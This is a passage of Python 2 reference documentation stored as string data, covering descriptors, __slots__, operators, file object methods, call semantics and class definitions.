This should only be implemented if "del obj.name" is\n meaningful for the object.\n\n\nMore attribute access for new-style classes\n===========================================\n\nThe following methods only apply to new-style classes.\n\nobject.__getattribute__(self, name)\n\n Called unconditionally to implement attribute accesses for\n instances of the class. If the class also defines "__getattr__()",\n the latter will not be called unless "__getattribute__()" either\n calls it explicitly or raises an "AttributeError". This method\n should return the (computed) attribute value or raise an\n "AttributeError" exception. In order to avoid infinite recursion in\n this method, its implementation should always call the base class\n method with the same name to access any attributes it needs, for\n example, "object.__getattribute__(self, name)".\n\n Note: This method may still be bypassed when looking up special\n methods as the result of implicit invocation via language syntax\n or built-in functions. See Special method lookup for new-style\n classes.\n\n\nImplementing Descriptors\n========================\n\nThe following methods only apply when an instance of the class\ncontaining the method (a so-called *descriptor* class) appears in an\n*owner* class (the descriptor must be in either the owner\'s class\ndictionary or in the class dictionary for one of its parents). In the\nexamples below, "the attribute" refers to the attribute whose name is\nthe key of the property in the owner class\' "__dict__".\n\nobject.__get__(self, instance, owner)\n\n Called to get the attribute of the owner class (class attribute\n access) or of an instance of that class (instance attribute\n access). *owner* is always the owner class, while *instance* is the\n instance that the attribute was accessed through, or "None" when\n the attribute is accessed through the *owner*. This method should\n return the (computed) attribute value or raise an "AttributeError"\n exception.\n\nobject.__set__(self, instance, value)\n\n Called to set the attribute on an instance *instance* of the owner\n class to a new value, *value*.\n\nobject.__delete__(self, instance)\n\n Called to delete the attribute on an instance *instance* of the\n owner class.\n\n\nInvoking Descriptors\n====================\n\nIn general, a descriptor is an object attribute with "binding\nbehavior", one whose attribute access has been overridden by methods\nin the descriptor protocol: "__get__()", "__set__()", and\n"__delete__()". If any of those methods are defined for an object, it\nis said to be a descriptor.\n\nThe default behavior for attribute access is to get, set, or delete\nthe attribute from an object\'s dictionary. For instance, "a.x" has a\nlookup chain starting with "a.__dict__[\'x\']", then\n"type(a).__dict__[\'x\']", and continuing through the base classes of\n"type(a)" excluding metaclasses.\n\nHowever, if the looked-up value is an object defining one of the\ndescriptor methods, then Python may override the default behavior and\ninvoke the descriptor method instead. Where this occurs in the\nprecedence chain depends on which descriptor methods were defined and\nhow they were called. Note that descriptors are only invoked for new\nstyle objects or classes (ones that subclass "object()" or "type()").\n\nThe starting point for descriptor invocation is a binding, "a.x". 
How\nthe arguments are assembled depends on "a":\n\nDirect Call\n The simplest and least common call is when user code directly\n invokes a descriptor method: "x.__get__(a)".\n\nInstance Binding\n If binding to a new-style object instance, "a.x" is transformed\n into the call: "type(a).__dict__[\'x\'].__get__(a, type(a))".\n\nClass Binding\n If binding to a new-style class, "A.x" is transformed into the\n call: "A.__dict__[\'x\'].__get__(None, A)".\n\nSuper Binding\n If "a" is an instance of "super", then the binding "super(B,\n obj).m()" searches "obj.__class__.__mro__" for the base class "A"\n immediately preceding "B" and then invokes the descriptor with the\n call: "A.__dict__[\'m\'].__get__(obj, obj.__class__)".\n\nFor instance bindings, the precedence of descriptor invocation depends\non which descriptor methods are defined. A descriptor can define\nany combination of "__get__()", "__set__()" and "__delete__()". If it\ndoes not define "__get__()", then accessing the attribute will return\nthe descriptor object itself unless there is a value in the object\'s\ninstance dictionary. If the descriptor defines "__set__()" and/or\n"__delete__()", it is a data descriptor; if it defines neither, it is\na non-data descriptor. Normally, data descriptors define both\n"__get__()" and "__set__()", while non-data descriptors have just the\n"__get__()" method. Data descriptors with "__set__()" and "__get__()"\ndefined always override a redefinition in an instance dictionary. In\ncontrast, non-data descriptors can be overridden by instances.\n\nPython methods (including "staticmethod()" and "classmethod()") are\nimplemented as non-data descriptors. Accordingly, instances can\nredefine and override methods. This allows individual instances to\nacquire behaviors that differ from other instances of the same class.\n\nThe "property()" function is implemented as a data descriptor.\nAccordingly, instances cannot override the behavior of a property.\n\n\n__slots__\n=========\n\nBy default, instances of both old and new-style classes have a\ndictionary for attribute storage. This wastes space for objects\nhaving very few instance variables. The space consumption can become\nacute when creating large numbers of instances.\n\nThe default can be overridden by defining *__slots__* in a new-style\nclass definition. The *__slots__* declaration takes a sequence of\ninstance variables and reserves just enough space in each instance to\nhold a value for each variable. Space is saved because *__dict__* is\nnot created for each instance.\n\n__slots__\n\n This class variable can be assigned a string, iterable, or sequence\n of strings with variable names used by instances. If defined in a\n new-style class, *__slots__* reserves space for the declared\n variables and prevents the automatic creation of *__dict__* and\n *__weakref__* for each instance.\n\n New in version 2.2.\n\nNotes on using *__slots__*\n\n* When inheriting from a class without *__slots__*, the *__dict__*\n attribute of that class will always be accessible, so a *__slots__*\n definition in the subclass is meaningless.\n\n* Without a *__dict__* variable, instances cannot be assigned new\n variables not listed in the *__slots__* definition. Attempts to\n assign to an unlisted variable name raise "AttributeError". 
If\n dynamic assignment of new variables is desired, then add\n "\'__dict__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__dict__\'" to the\n *__slots__* declaration would not enable the assignment of new\n attributes not specifically listed in the sequence of instance\n variable names.\n\n* Without a *__weakref__* variable for each instance, classes\n defining *__slots__* do not support weak references to its\n instances. If weak reference support is needed, then add\n "\'__weakref__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__weakref__\'" to the\n *__slots__* declaration would not enable support for weak\n references.\n\n* *__slots__* are implemented at the class level by creating\n descriptors (Implementing Descriptors) for each variable name. As a\n result, class attributes cannot be used to set default values for\n instance variables defined by *__slots__*; otherwise, the class\n attribute would overwrite the descriptor assignment.\n\n* The action of a *__slots__* declaration is limited to the class\n where it is defined. As a result, subclasses will have a *__dict__*\n unless they also define *__slots__* (which must only contain names\n of any *additional* slots).\n\n* If a class defines a slot also defined in a base class, the\n instance variable defined by the base class slot is inaccessible\n (except by retrieving its descriptor directly from the base class).\n This renders the meaning of the program undefined. In the future, a\n check may be added to prevent this.\n\n* Nonempty *__slots__* does not work for classes derived from\n "variable-length" built-in types such as "long", "str" and "tuple".\n\n* Any non-string iterable may be assigned to *__slots__*. Mappings\n may also be used; however, in the future, special meaning may be\n assigned to the values corresponding to each key.\n\n* *__class__* assignment works only if both classes have the same\n *__slots__*.\n\n Changed in version 2.6: Previously, *__class__* assignment raised an\n error if either new or old class had *__slots__*.\n', 'attribute-references': u'\nAttribute references\n********************\n\nAn attribute reference is a primary followed by a period and a name:\n\n attributeref ::= primary "." identifier\n\nThe primary must evaluate to an object of a type that supports\nattribute references, e.g., a module, list, or an instance. This\nobject is then asked to produce the attribute whose name is the\nidentifier. If this attribute is not available, the exception\n"AttributeError" is raised. Otherwise, the type and value of the\nobject produced is determined by the object. 
Multiple evaluations of\nthe same attribute reference may yield different objects.\n', 'augassign': u'\nAugmented assignment statements\n*******************************\n\nAugmented assignment is the combination, in a single statement, of a\nbinary operation and an assignment statement:\n\n augmented_assignment_stmt ::= augtarget augop (expression_list | yield_expression)\n augtarget ::= identifier | attributeref | subscription | slicing\n augop ::= "+=" | "-=" | "*=" | "/=" | "//=" | "%=" | "**="\n | ">>=" | "<<=" | "&=" | "^=" | "|="\n\n(See section Primaries for the syntax definitions for the last three\nsymbols.)\n\nAn augmented assignment evaluates the target (which, unlike normal\nassignment statements, cannot be an unpacking) and the expression\nlist, performs the binary operation specific to the type of assignment\non the two operands, and assigns the result to the original target.\nThe target is only evaluated once.\n\nAn augmented assignment expression like "x += 1" can be rewritten as\n"x = x + 1" to achieve a similar, but not exactly equal effect. In the\naugmented version, "x" is only evaluated once. Also, when possible,\nthe actual operation is performed *in-place*, meaning that rather than\ncreating a new object and assigning that to the target, the old object\nis modified instead.\n\nWith the exception of assigning to tuples and multiple targets in a\nsingle statement, the assignment done by augmented assignment\nstatements is handled the same way as normal assignments. Similarly,\nwith the exception of the possible *in-place* behavior, the binary\noperation performed by augmented assignment is the same as the normal\nbinary operations.\n\nFor targets which are attribute references, the same caveat about\nclass and instance attributes applies as for regular assignments.\n', 'binary': u'\nBinary arithmetic operations\n****************************\n\nThe binary arithmetic operations have the conventional priority\nlevels. Note that some of these operations also apply to certain non-\nnumeric types. Apart from the power operator, there are only two\nlevels, one for multiplicative operators and one for additive\noperators:\n\n m_expr ::= u_expr | m_expr "*" u_expr | m_expr "//" u_expr | m_expr "/" u_expr\n | m_expr "%" u_expr\n a_expr ::= m_expr | a_expr "+" m_expr | a_expr "-" m_expr\n\nThe "*" (multiplication) operator yields the product of its arguments.\nThe arguments must either both be numbers, or one argument must be an\ninteger (plain or long) and the other must be a sequence. In the\nformer case, the numbers are converted to a common type and then\nmultiplied together. In the latter case, sequence repetition is\nperformed; a negative repetition factor yields an empty sequence.\n\nThe "/" (division) and "//" (floor division) operators yield the\nquotient of their arguments. The numeric arguments are first\nconverted to a common type. Plain or long integer division yields an\ninteger of the same type; the result is that of mathematical division\nwith the \'floor\' function applied to the result. Division by zero\nraises the "ZeroDivisionError" exception.\n\nThe "%" (modulo) operator yields the remainder from the division of\nthe first argument by the second. The numeric arguments are first\nconverted to a common type. A zero right argument raises the\n"ZeroDivisionError" exception. The arguments may be floating point\nnumbers, e.g., "3.14%0.7" equals "0.34" (since "3.14" equals "4*0.7 +\n0.34".) 
The modulo operator always yields a result with the same sign\nas its second operand (or zero); the absolute value of the result is\nstrictly smaller than the absolute value of the second operand [2].\n\nThe integer division and modulo operators are connected by the\nfollowing identity: "x == (x/y)*y + (x%y)". Integer division and\nmodulo are also connected with the built-in function "divmod()":\n"divmod(x, y) == (x/y, x%y)". These identities don\'t hold for\nfloating point numbers; there similar identities hold approximately\nwhere "x/y" is replaced by "floor(x/y)" or "floor(x/y) - 1" [3].\n\nIn addition to performing the modulo operation on numbers, the "%"\noperator is also overloaded by string and unicode objects to perform\nstring formatting (also known as interpolation). The syntax for string\nformatting is described in the Python Library Reference, section\nString Formatting Operations.\n\nDeprecated since version 2.3: The floor division operator, the modulo\noperator, and the "divmod()" function are no longer defined for\ncomplex numbers. Instead, convert to a floating point number using\nthe "abs()" function if appropriate.\n\nThe "+" (addition) operator yields the sum of its arguments. The\narguments must either both be numbers or both sequences of the same\ntype. In the former case, the numbers are converted to a common type\nand then added together. In the latter case, the sequences are\nconcatenated.\n\nThe "-" (subtraction) operator yields the difference of its arguments.\nThe numeric arguments are first converted to a common type.\n', 'bitwise': u'\nBinary bitwise operations\n*************************\n\nEach of the three bitwise operations has a different priority level:\n\n and_expr ::= shift_expr | and_expr "&" shift_expr\n xor_expr ::= and_expr | xor_expr "^" and_expr\n or_expr ::= xor_expr | or_expr "|" xor_expr\n\nThe "&" operator yields the bitwise AND of its arguments, which must\nbe plain or long integers. The arguments are converted to a common\ntype.\n\nThe "^" operator yields the bitwise XOR (exclusive OR) of its\narguments, which must be plain or long integers. The arguments are\nconverted to a common type.\n\nThe "|" operator yields the bitwise (inclusive) OR of its arguments,\nwhich must be plain or long integers. The arguments are converted to\na common type.\n', 'bltin-code-objects': u'\nCode Objects\n************\n\nCode objects are used by the implementation to represent "pseudo-\ncompiled" executable Python code such as a function body. They differ\nfrom function objects because they don\'t contain a reference to their\nglobal execution environment. Code objects are returned by the built-\nin "compile()" function and can be extracted from function objects\nthrough their "func_code" attribute. See also the "code" module.\n\nA code object can be executed or evaluated by passing it (instead of a\nsource string) to the "exec" statement or the built-in "eval()"\nfunction.\n\nSee The standard type hierarchy for more information.\n', 'bltin-ellipsis-object': u'\nThe Ellipsis Object\n*******************\n\nThis object is used by extended slice notation (see Slicings). It\nsupports no special operations. There is exactly one ellipsis object,\nnamed "Ellipsis" (a built-in name).\n\nIt is written as "Ellipsis". When in a subscript, it can also be\nwritten as "...", for example "seq[...]".\n', 'bltin-file-objects': u'\nFile Objects\n************\n\nFile objects are implemented using C\'s "stdio" package and can be\ncreated with the built-in "open()" function. 
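A minimal sketch of creating and then reading back a file object with "open()" (Python 2; the filename is illustrative):

   f = open("example.txt", "w")   # mode "w" creates or truncates the file
   f.write("one\ntwo\n")
   f.close()

   f = open("example.txt")        # the default mode is "r"
   for line in f:                 # a file object is its own iterator
       print line,                # trailing comma: each line keeps its newline
   f.close()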
File objects are also\nreturned by some other built-in functions and methods, such as\n"os.popen()" and "os.fdopen()" and the "makefile()" method of socket\nobjects. Temporary files can be created using the "tempfile" module,\nand high-level file operations such as copying, moving, and deleting\nfiles and directories can be achieved with the "shutil" module.\n\nWhen a file operation fails for an I/O-related reason, the exception\n"IOError" is raised. This includes situations where the operation is\nnot defined for some reason, like "seek()" on a tty device or writing\na file opened for reading.\n\nFiles have the following methods:\n\nfile.close()\n\n Close the file. A closed file cannot be read or written any more.\n Any operation which requires that the file be open will raise a\n "ValueError" after the file has been closed. Calling "close()"\n more than once is allowed.\n\n As of Python 2.5, you can avoid having to call this method\n explicitly if you use the "with" statement. For example, the\n following code will automatically close *f* when the "with" block\n is exited:\n\n from __future__ import with_statement # This isn\'t required in Python 2.6\n\n with open("hello.txt") as f:\n for line in f:\n print line,\n\n In older versions of Python, you would have needed to do this to\n get the same effect:\n\n f = open("hello.txt")\n try:\n for line in f:\n print line,\n finally:\n f.close()\n\n Note: Not all "file-like" types in Python support use as a\n context manager for the "with" statement. If your code is\n intended to work with any file-like object, you can use the\n function "contextlib.closing()" instead of using the object\n directly.\n\nfile.flush()\n\n Flush the internal buffer, like "stdio"\'s "fflush()". This may be\n a no-op on some file-like objects.\n\n Note: "flush()" does not necessarily write the file\'s data to\n disk. Use "flush()" followed by "os.fsync()" to ensure this\n behavior.\n\nfile.fileno()\n\n Return the integer "file descriptor" that is used by the underlying\n implementation to request I/O operations from the operating system.\n This can be useful for other, lower level interfaces that use file\n descriptors, such as the "fcntl" module or "os.read()" and friends.\n\n Note: File-like objects which do not have a real file descriptor\n should *not* provide this method!\n\nfile.isatty()\n\n Return "True" if the file is connected to a tty(-like) device, else\n "False".\n\n Note: If a file-like object is not associated with a real file,\n this method should *not* be implemented.\n\nfile.next()\n\n A file object is its own iterator, for example "iter(f)" returns\n *f* (unless *f* is closed). When a file is used as an iterator,\n typically in a "for" loop (for example, "for line in f: print\n line.strip()"), the "next()" method is called repeatedly. This\n method returns the next input line, or raises "StopIteration" when\n EOF is hit when the file is open for reading (behavior is undefined\n when the file is open for writing). In order to make a "for" loop\n the most efficient way of looping over the lines of a file (a very\n common operation), the "next()" method uses a hidden read-ahead\n buffer. As a consequence of using a read-ahead buffer, combining\n "next()" with other file methods (like "readline()") does not work\n right. 
However, using "seek()" to reposition the file to an\n absolute position will flush the read-ahead buffer.\n\n New in version 2.3.\n\nfile.read([size])\n\n Read at most *size* bytes from the file (less if the read hits EOF\n before obtaining *size* bytes). If the *size* argument is negative\n or omitted, read all data until EOF is reached. The bytes are\n returned as a string object. An empty string is returned when EOF\n is encountered immediately. (For certain files, like ttys, it\n makes sense to continue reading after an EOF is hit.) Note that\n this method may call the underlying C function "fread()" more than\n once in an effort to acquire as close to *size* bytes as possible.\n Also note that when in non-blocking mode, less data than was\n requested may be returned, even if no *size* parameter was given.\n\n Note: This function is simply a wrapper for the underlying\n "fread()" C function, and will behave the same in corner cases,\n such as whether the EOF value is cached.\n\nfile.readline([size])\n\n Read one entire line from the file. A trailing newline character\n is kept in the string (but may be absent when a file ends with an\n incomplete line). [6] If the *size* argument is present and non-\n negative, it is a maximum byte count (including the trailing\n newline) and an incomplete line may be returned. When *size* is not\n 0, an empty string is returned *only* when EOF is encountered\n immediately.\n\n Note: Unlike "stdio"\'s "fgets()", the returned string contains\n null characters ("\'\\0\'") if they occurred in the input.\n\nfile.readlines([sizehint])\n\n Read until EOF using "readline()" and return a list containing the\n lines thus read. If the optional *sizehint* argument is present,\n instead of reading up to EOF, whole lines totalling approximately\n *sizehint* bytes (possibly after rounding up to an internal buffer\n size) are read. Objects implementing a file-like interface may\n choose to ignore *sizehint* if it cannot be implemented, or cannot\n be implemented efficiently.\n\nfile.xreadlines()\n\n This method returns the same thing as "iter(f)".\n\n New in version 2.1.\n\n Deprecated since version 2.3: Use "for line in file" instead.\n\nfile.seek(offset[, whence])\n\n Set the file\'s current position, like "stdio"\'s "fseek()". The\n *whence* argument is optional and defaults to "os.SEEK_SET" or "0"\n (absolute file positioning); other values are "os.SEEK_CUR" or "1"\n (seek relative to the current position) and "os.SEEK_END" or "2"\n (seek relative to the file\'s end). There is no return value.\n\n For example, "f.seek(2, os.SEEK_CUR)" advances the position by two\n and "f.seek(-3, os.SEEK_END)" sets the position to the third to\n last.\n\n Note that if the file is opened for appending (mode "\'a\'" or\n "\'a+\'"), any "seek()" operations will be undone at the next write.\n If the file is only opened for writing in append mode (mode "\'a\'"),\n this method is essentially a no-op, but it remains useful for files\n opened in append mode with reading enabled (mode "\'a+\'"). If the\n file is opened in text mode (without "\'b\'"), only offsets returned\n by "tell()" are legal. Use of other offsets causes undefined\n behavior.\n\n Note that not all file objects are seekable.\n\n Changed in version 2.6: Passing float values as offset has been\n deprecated.\n\nfile.tell()\n\n Return the file\'s current position, like "stdio"\'s "ftell()".\n\n Note: On Windows, "tell()" can return illegal values (after an\n "fgets()") when reading files with Unix-style line-endings. 
Use\n binary mode ("\'rb\'") to circumvent this problem.\n\nfile.truncate([size])\n\n Truncate the file\'s size. If the optional *size* argument is\n present, the file is truncated to (at most) that size. The size\n defaults to the current position. The current file position is not\n changed. Note that if a specified size exceeds the file\'s current\n size, the result is platform-dependent: possibilities include that\n the file may remain unchanged, increase to the specified size as if\n zero-filled, or increase to the specified size with undefined new\n content. Availability: Windows, many Unix variants.\n\nfile.write(str)\n\n Write a string to the file. There is no return value. Due to\n buffering, the string may not actually show up in the file until\n the "flush()" or "close()" method is called.\n\nfile.writelines(sequence)\n\n Write a sequence of strings to the file. The sequence can be any\n iterable object producing strings, typically a list of strings.\n There is no return value. (The name is intended to match\n "readlines()"; "writelines()" does not add line separators.)\n\nFiles support the iterator protocol. Each iteration returns the same\nresult as "readline()", and iteration ends when the "readline()"\nmethod returns an empty string.\n\nFile objects also offer a number of other interesting attributes.\nThese are not required for file-like objects, but should be\nimplemented if they make sense for the particular object.\n\nfile.closed\n\n bool indicating the current state of the file object. This is a\n read-only attribute; the "close()" method changes the value. It may\n not be available on all file-like objects.\n\nfile.encoding\n\n The encoding that this file uses. When Unicode strings are written\n to a file, they will be converted to byte strings using this\n encoding. In addition, when the file is connected to a terminal,\n the attribute gives the encoding that the terminal is likely to use\n (that information might be incorrect if the user has misconfigured\n the terminal). The attribute is read-only and may not be present\n on all file-like objects. It may also be "None", in which case the\n file uses the system default encoding for converting Unicode\n strings.\n\n New in version 2.3.\n\nfile.errors\n\n The Unicode error handler used along with the encoding.\n\n New in version 2.6.\n\nfile.mode\n\n The I/O mode for the file. If the file was created using the\n "open()" built-in function, this will be the value of the *mode*\n parameter. This is a read-only attribute and may not be present on\n all file-like objects.\n\nfile.name\n\n If the file object was created using "open()", the name of the\n file. Otherwise, some string that indicates the source of the file\n object, of the form "<...>". This is a read-only attribute and may\n not be present on all file-like objects.\n\nfile.newlines\n\n If Python was built with *universal newlines* enabled (the default)\n this read-only attribute exists, and for files opened in universal\n newline read mode it keeps track of the types of newlines\n encountered while reading the file. The values it can take are\n "\'\\r\'", "\'\\n\'", "\'\\r\\n\'", "None" (unknown, no newlines read yet) or\n a tuple containing all the newline types seen, to indicate that\n multiple newline conventions were encountered. 
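As an aside, the write-side methods documented above combine as follows (Python 2 sketch; the filename is illustrative):

   f = open("notes.txt", "w")
   f.writelines(["first\n", "second\n"])   # writelines() adds no separators
   f.write("third\n")                      # write() likewise appends nothing
   f.flush()                               # push the buffer out; see flush() above
   f.close()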
For files not opened\n in universal newlines read mode the value of this attribute will be\n "None".\n\nfile.softspace\n\n Boolean that indicates whether a space character needs to be\n printed before another value when using the "print" statement.\n Classes that are trying to simulate a file object should also have\n a writable "softspace" attribute, which should be initialized to\n zero. This will be automatic for most classes implemented in\n Python (care may be needed for objects that override attribute\n access); types implemented in C will have to provide a writable\n "softspace" attribute.\n\n Note: This attribute is not used to control the "print"\n statement, but to allow the implementation of "print" to keep\n track of its internal state.\n', 'bltin-null-object': u'\nThe Null Object\n***************\n\nThis object is returned by functions that don\'t explicitly return a\nvalue. It supports no special operations. There is exactly one null\nobject, named "None" (a built-in name).\n\nIt is written as "None".\n', 'bltin-type-objects': u'\nType Objects\n************\n\nType objects represent the various object types. An object\'s type is\naccessed by the built-in function "type()". There are no special\noperations on types. The standard module "types" defines names for\nall standard built-in types.\n\nTypes are written like this: "<type \'int\'>".\n', 'booleans': u'\nBoolean operations\n******************\n\n or_test ::= and_test | or_test "or" and_test\n and_test ::= not_test | and_test "and" not_test\n not_test ::= comparison | "not" not_test\n\nIn the context of Boolean operations, and also when expressions are\nused by control flow statements, the following values are interpreted\nas false: "False", "None", numeric zero of all types, and empty\nstrings and containers (including strings, tuples, lists,\ndictionaries, sets and frozensets). All other values are interpreted\nas true. (See the "__nonzero__()" special method for a way to change\nthis.)\n\nThe operator "not" yields "True" if its argument is false, "False"\notherwise.\n\nThe expression "x and y" first evaluates *x*; if *x* is false, its\nvalue is returned; otherwise, *y* is evaluated and the resulting value\nis returned.\n\nThe expression "x or y" first evaluates *x*; if *x* is true, its value\nis returned; otherwise, *y* is evaluated and the resulting value is\nreturned.\n\n(Note that neither "and" nor "or" restrict the value and type they\nreturn to "False" and "True", but rather return the last evaluated\nargument. This is sometimes useful, e.g., if "s" is a string that\nshould be replaced by a default value if it is empty, the expression\n"s or \'foo\'" yields the desired value. 
Because "not" has to invent a\nvalue anyway, it does not bother to return a value of the same type as\nits argument, so e.g., "not \'foo\'" yields "False", not "\'\'".)\n', 'break': u'\nThe "break" statement\n*********************\n\n break_stmt ::= "break"\n\n"break" may only occur syntactically nested in a "for" or "while"\nloop, but not nested in a function or class definition within that\nloop.\n\nIt terminates the nearest enclosing loop, skipping the optional "else"\nclause if the loop has one.\n\nIf a "for" loop is terminated by "break", the loop control target\nkeeps its current value.\n\nWhen "break" passes control out of a "try" statement with a "finally"\nclause, that "finally" clause is executed before really leaving the\nloop.\n', 'callable-types': u'\nEmulating callable objects\n**************************\n\nobject.__call__(self[, args...])\n\n Called when the instance is "called" as a function; if this method\n is defined, "x(arg1, arg2, ...)" is a shorthand for\n "x.__call__(arg1, arg2, ...)".\n', 'calls': u'\nCalls\n*****\n\nA call calls a callable object (e.g., a *function*) with a possibly\nempty series of *arguments*:\n\n call ::= primary "(" [argument_list [","]\n | expression genexpr_for] ")"\n argument_list ::= positional_arguments ["," keyword_arguments]\n ["," "*" expression] ["," keyword_arguments]\n ["," "**" expression]\n | keyword_arguments ["," "*" expression]\n ["," "**" expression]\n | "*" expression ["," keyword_arguments] ["," "**" expression]\n | "**" expression\n positional_arguments ::= expression ("," expression)*\n keyword_arguments ::= keyword_item ("," keyword_item)*\n keyword_item ::= identifier "=" expression\n\nA trailing comma may be present after the positional and keyword\narguments but does not affect the semantics.\n\nThe primary must evaluate to a callable object (user-defined\nfunctions, built-in functions, methods of built-in objects, class\nobjects, methods of class instances, and certain class instances\nthemselves are callable; extensions may define additional callable\nobject types). All argument expressions are evaluated before the call\nis attempted. Please refer to section Function definitions for the\nsyntax of formal *parameter* lists.\n\nIf keyword arguments are present, they are first converted to\npositional arguments, as follows. First, a list of unfilled slots is\ncreated for the formal parameters. If there are N positional\narguments, they are placed in the first N slots. Next, for each\nkeyword argument, the identifier is used to determine the\ncorresponding slot (if the identifier is the same as the first formal\nparameter name, the first slot is used, and so on). If the slot is\nalready filled, a "TypeError" exception is raised. Otherwise, the\nvalue of the argument is placed in the slot, filling it (even if the\nexpression is "None", it fills the slot). When all arguments have\nbeen processed, the slots that are still unfilled are filled with the\ncorresponding default value from the function definition. (Default\nvalues are calculated, once, when the function is defined; thus, a\nmutable object such as a list or dictionary used as default value will\nbe shared by all calls that don\'t specify an argument value for the\ncorresponding slot; this should usually be avoided.) If there are any\nunfilled slots for which no default value is specified, a "TypeError"\nexception is raised. 
Otherwise, the list of filled slots is used as\nthe argument list for the call.\n\n**CPython implementation detail:** An implementation may provide\nbuilt-in functions whose positional parameters do not have names, even\nif they are \'named\' for the purpose of documentation, and which\ntherefore cannot be supplied by keyword. In CPython, this is the case\nfor functions implemented in C that use "PyArg_ParseTuple()" to parse\ntheir arguments.\n\nIf there are more positional arguments than there are formal parameter\nslots, a "TypeError" exception is raised, unless a formal parameter\nusing the syntax "*identifier" is present; in this case, that formal\nparameter receives a tuple containing the excess positional arguments\n(or an empty tuple if there were no excess positional arguments).\n\nIf any keyword argument does not correspond to a formal parameter\nname, a "TypeError" exception is raised, unless a formal parameter\nusing the syntax "**identifier" is present; in this case, that formal\nparameter receives a dictionary containing the excess keyword\narguments (using the keywords as keys and the argument values as\ncorresponding values), or a (new) empty dictionary if there were no\nexcess keyword arguments.\n\nIf the syntax "*expression" appears in the function call, "expression"\nmust evaluate to an iterable. Elements from this iterable are treated\nas if they were additional positional arguments; if there are\npositional arguments *x1*, ..., *xN*, and "expression" evaluates to a\nsequence *y1*, ..., *yM*, this is equivalent to a call with M+N\npositional arguments *x1*, ..., *xN*, *y1*, ..., *yM*.\n\nA consequence of this is that although the "*expression" syntax may\nappear *after* some keyword arguments, it is processed *before* the\nkeyword arguments (and the "**expression" argument, if any -- see\nbelow). So:\n\n >>> def f(a, b):\n ... print a, b\n ...\n >>> f(b=1, *(2,))\n 2 1\n >>> f(a=1, *(2,))\n Traceback (most recent call last):\n File "<stdin>", line 1, in ?\n TypeError: f() got multiple values for keyword argument \'a\'\n >>> f(1, *(2,))\n 1 2\n\nIt is unusual for both keyword arguments and the "*expression" syntax\nto be used in the same call, so in practice this confusion does not\narise.\n\nIf the syntax "**expression" appears in the function call,\n"expression" must evaluate to a mapping, the contents of which are\ntreated as additional keyword arguments. In the case of a keyword\nappearing in both "expression" and as an explicit keyword argument, a\n"TypeError" exception is raised.\n\nFormal parameters using the syntax "*identifier" or "**identifier"\ncannot be used as positional argument slots or as keyword argument\nnames. Formal parameters using the syntax "(sublist)" cannot be used\nas keyword argument names; the outermost sublist corresponds to a\nsingle unnamed argument slot, and the argument value is assigned to\nthe sublist using the usual tuple assignment rules after all other\nparameter processing is done.\n\nA call always returns some value, possibly "None", unless it raises an\nexception. How this value is computed depends on the type of the\ncallable object.\n\nIf it is---\n\na user-defined function:\n The code block for the function is executed, passing it the\n argument list. The first thing the code block will do is bind the\n formal parameters to the arguments; this is described in section\n Function definitions. 
When the code block executes a "return"\n statement, this specifies the return value of the function call.\n\na built-in function or method:\n The result is up to the interpreter; see Built-in Functions for the\n descriptions of built-in functions and methods.\n\na class object:\n A new instance of that class is returned.\n\na class instance method:\n The corresponding user-defined function is called, with an argument\n list that is one longer than the argument list of the call: the\n instance becomes the first argument.\n\na class instance:\n The class must define a "__call__()" method; the effect is then the\n same as if that method was called.\n', 'class': u'\nClass definitions\n*****************\n\nA class definition defines a class object (see section The standard\ntype hierarchy):\n\n classdef ::= "class" classname [inheritance] ":" suite\n inheritance ::= "(" [expression_list] ")"\n classname ::= identifier\n\nA class definition is an executable statement. It first evaluates the\ninheritance list, if present. Each item in the inheritance list\nshould evaluate to a class object or class type which allows\nsubclassing. The class\'s suite is then executed in a new execution\nframe (see section Naming and binding), using a newly created local\nnamespace and the original global namespace. (Usually, the suite\ncontains only function definitions.) When the class\'s suite finishes\nexecution, its execution frame is discarded but its local namespace is\nsaved. [4] A class object is then created using the inheritance list\nfor the base classes and the saved local namespace for the attribute\ndictionary. The class name is bound to this class object in the\noriginal local namespace.\n\n**Programmer\'s note:** Variables defined in the class definition are\nclass variables; they are shared by all instances. To create instance\nvariables, they can be set in a method with "self.name = value". Both\nclass and instance variables are accessible through the notation\n""self.name"", and an instance variable hides a class variable with\nthe same name when accessed in this way. Class variables can be used\nas defaults for instance variables, but using mutable values there can\nlead to unexpected results. For *new-style class*es, descriptors can\nbe used to create instance variables with different implementation\ndetails.\n\nClass definitions, like function definitions, may be wrapped by one or\nmore *decorator* expressions. The evaluation rules for the decorator\nexpressions are the same as for functions. The result must be a class\nobject, which is then bound to the class name.\n\n-[ Footnotes ]-\n\n[1] The exception is propagated to the invocation stack unless\n there is a "finally" clause which happens to raise another\n exception. That new exception causes the old one to be lost.\n\n[2] Currently, control "flows off the end" except in the case of\n an exception or the execution of a "return", "continue", or\n "break" statement.\n\n[3] A string literal appearing as the first statement in the\n function body is transformed into the function\'s "__doc__"\n attribute and therefore the function\'s *docstring*.\n\n[4] A string literal appearing as the first statement in the class\n body is transformed into the namespace\'s "__doc__" item and\n therefore the class\'s *docstring*.\n', 'comparisons': u'\nComparisons\n***********\n\nUnlike C, all comparison operations in Python have the same priority,\nwhich is lower than that of any arithmetic, shifting or bitwise\noperation. 
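For instance, arithmetic binds more tightly, so both operands below are fully computed before the comparison is made (illustrative values):

   print 1 + 2 < 2 * 3            # True: compares 3 < 6, no parentheses needed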
